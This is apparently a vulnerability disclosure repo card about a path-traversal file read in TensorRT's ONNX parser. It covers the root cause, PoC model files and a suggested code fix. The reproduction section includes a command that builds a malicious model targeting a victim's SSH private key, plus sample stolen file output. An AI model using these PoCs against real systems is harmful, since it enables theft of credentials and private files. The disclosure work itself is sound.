YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

VULN-016: Arbitrary File Read via ONNX External Data Path Traversal in TensorRT

Vulnerability

TensorRT's ONNX parser (libnvonnxparser) allows absolute file paths in the external_data.location field of ONNX TensorProto initializers. When a victim loads a malicious ONNX model, arbitrary files from their filesystem are read as model weights and embedded into the compiled TensorRT engine.

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Severity

Critical (CVSS 3.1: 9.1)

Root Cause

normalizePath() in weightUtils.cpp blocks ../ relative directory traversal but does NOT reject absolute paths like C:/Windows/win.ini or /etc/passwd. The absolute path passes through all validation and is used directly in CreateFileMapping() / mmap().

Affected Versions

  • TensorRT 10.16.0.29 (tested)
  • Likely all TensorRT versions with ONNX external data support

Impact

An attacker can craft a ~200-byte ONNX model that, when loaded by TensorRT:

  1. Reads arbitrary files from the victim's filesystem
  2. Embeds file contents into the compiled TensorRT engine
  3. Exposes stolen data through inference output

Attack scenarios: steal SSH keys, cloud credentials, application configs, proprietary models.

Files

File Description
poc_windows.onnx PoC model targeting C:/Windows/win.ini (Windows)
poc_linux.onnx PoC model targeting /etc/hostname (Linux)
reproduce.py Reproduction script ? loads PoC model and extracts stolen file contents
create_malicious_model.py Tool to create custom malicious models targeting any file

Reproduction

# 1. Install requirements
pip install tensorrt numpy onnx

# 2. Run the PoC (Windows)
python reproduce.py poc_windows.onnx

# 3. Or create a custom exploit model
python create_malicious_model.py C:/Users/victim/.ssh/id_rsa exploit.onnx 4096
python reproduce.py exploit.onnx

Expected Output

[*] Loading model: poc_windows.onnx
[+] Parse succeeded - external file was read as model weights!
[+] Engine built - file contents now embedded in TensorRT engine
[+] Extracted 92 bytes from target file:
----------------------------------------
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
----------------------------------------

Verified Reads

Target File Result
C:/Windows/System32/kernel32.dll Read successful (4096 bytes)
C:/Windows/System32/ntdll.dll Read successful (4096 bytes)
C:/Windows/win.ini Read successful ? byte-for-byte content match verified

Suggested Fix

In parseExternalWeights(), reject absolute paths:

std::string normalizedFile = normalizePath(file);
if (normalizedFile.find("../") != std::string::npos) return false;
// ADD: reject absolute paths
if (!normalizedFile.empty() && (normalizedFile[0] == '/' || normalizedFile[0] == '\\'))
    return false;
if (normalizedFile.size() > 1 && normalizedFile[1] == ':')
    return false;

Related CVEs

  • CVE-2022-25882: ONNX library path traversal via external_data
  • CVE-2024-27318: Bypass of CVE-2022-25882 fix
  • CVE-2024-5187: ONNX path traversal via tar
  • CVE-2025-51480: ONNX save_external_data path traversal

TensorRT's C++ parser has its own independent implementation that does not inherit fixes from the ONNX Python library.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support